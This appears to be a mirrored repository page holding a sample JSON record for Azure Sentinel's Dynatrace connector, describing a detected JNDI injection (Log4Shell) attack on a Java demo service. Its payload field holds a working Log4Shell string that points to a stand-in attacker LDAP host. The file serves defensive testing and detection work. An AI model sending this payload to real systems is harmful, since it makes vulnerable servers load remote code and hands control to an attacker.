Azure
/
Azure-Sentinel
зеркало из
1
0
Форкнуть 0
Код Задачи Пакеты Проекты Релизы Вики Активность
Azure-Sentinel/Sample Data/DynatraceAttacks_CL.json

197 строки
7.0 KiB
JSON
Исходник Постоянная ссылка Ответственный История

[
{
"attackId": "1698405124415_02195243643866821550",
"displayId": "A-22DAIC",
"timestamp": 1698405124415,
"displayName": "javax.servlet.ServletRequestWrapper.getParameterValues()",
"attackType": "JNDI_INJECTION",
"technology": "JAVA",
"state": "EXPLOITED",
"affectedEntities": {
"processGroupInstance": {
"id": "PROCESS_GROUP_INSTANCE-1BDCAF348EF31216",
"name": "SpringBoot org.dynatrace.ssrfservice.Application unguard-proxy-service-* (unguard-proxy-service-6f8686b97-zbm5n)"
},
"processGroup": {
"id": "PROCESS_GROUP-94E74515A8D874B1",
"name": "SpringBoot org.dynatrace.ssrfservice.Application unguard-proxy-service-*"
}
},
"request": {
"url": "/",
"host": null,
"path": "/",
"protocolDetails": {
"http": {
"requestMethod": "GET",
"headers": {
"values": [
{
"name": "x-client-ip",
"value": "192.168.1.1"
},
{
"name": "user-agent",
"value": "axios/0.20.0"
},
{
"name": "host",
"value": "unguard-proxy-service"
},
{
"name": "accept",
"value": "application/json, text/plain, */*"
},
{
"name": "x-dynatrace",
"value": "FW4;-1743916453;7;-359533746;498416;2;-860574453;372;d30e;2h02;3h87179aa2;4h0f4988;5h01;6heed8e7bffd3835c46961d6ded2ae3e75;7h59eb10f60139ab11"
},
{
"name": "traceparent",
"value": "00-eed8e7bffd3835c46961d6ded2ae3e75-59eb10f60139ab11-01"
},
{
"name": "tracestate",
"value": "ccb4ad0b-980df25b@dt=fw4;7;ea91f34e;79af0;2;0;0;174;a886;2h02;3h87179aa2;4h0f4988;5h01;7h59eb10f60139ab11"
},
{
"name": "connection",
"value": "close"
}
],
"truncationInfo": {
"truncated": false
}
},
"parameters": {
"values": [],
"truncationInfo": {
"truncated": true
}
}
}
}
},
"entrypoint": {
"codeLocation": null,
"entrypointFunction": {
"displayName": "ServletRequestWrapper.getParameterValues(String)",
"className": "javax.servlet.ServletRequestWrapper",
"functionName": "getParameterValues",
"parameterTypes": {
"values": [
"String"
],
"truncationInfo": {
"truncated": false
}
},
"returnType": "java.lang.String[]"
},
"payload": {
"values": [
{
"type": "HTTP_PARAMETER_VALUE",
"name": "url",
"value": "${jndi:ldap://evil-server.net:999/CompromiseMachine}"
}
],
"truncationInfo": {
"truncated": false
}
}
},
"vulnerability": {
"vulnerabilityId": "-7037978146758609592",
"displayName": "JndiManager.lookup():128",
"codeLocation": {
"displayName": "org.apache.logging.log4j.core.net.JndiManager.lookup(String):128",
"className": "org.apache.logging.log4j.core.net.JndiManager",
"functionName": "lookup",
"parameterTypes": {
"values": [
"String"
],
"truncationInfo": {
"truncated": false
}
},
"returnType": "java.lang.Object",
"lineNumber": 128
},
"vulnerableFunction": {
"displayName": "InitialContext.lookup(String)",
"className": "javax.naming.InitialContext",
"functionName": "lookup",
"parameterTypes": {
"values": [
"String"
],
"truncationInfo": {
"truncated": false
}
},
"returnType": "java.lang.Object"
},
"vulnerableFunctionInput": {
"type": "JNDI",
"inputSegments": [
{
"value": "ldap://evil-server.net:999/CompromiseMachine",
"type": "MALICIOUS_INPUT"
}
]
}
},
"attacker": {
"sourceIp": "192.168.1.1",
"location": {
"countryCode": "DE",
"country": "Germany",
"city": "Rottenburg"
}
},
"managementZones": [
{
"id": "2843874372046580667",
"name": "Dev2Dev Demo 2"
},
{
"id": "2631544906797876001",
"name": "Infrastructure Linux (incl PG)"
},
{
"id": "5996194749094481086",
"name": "XXXXX-TestZone"
},
{
"id": "1674365597043557983",
"name": "XXXX Test"
},
{
"id": "8696294048462936180",
"name": "excemptions test"
},
{
"id": "8097065485878182312",
"name": "java"
},
{
"id": "-8367998469205081223",
"name": "pgTestMz"
},
{
"id": "-2661345213750943630",
"name": "XXXXX-java-MZ"
},
{
"id": "-432603006836851299",
"name": "XXXX-mz"
},
{
"id": "5322819311624991300",
"name": "unguard"
}
]
}
]
Ссылка в новой задаче Показать git blame Копировать постоянную ссылку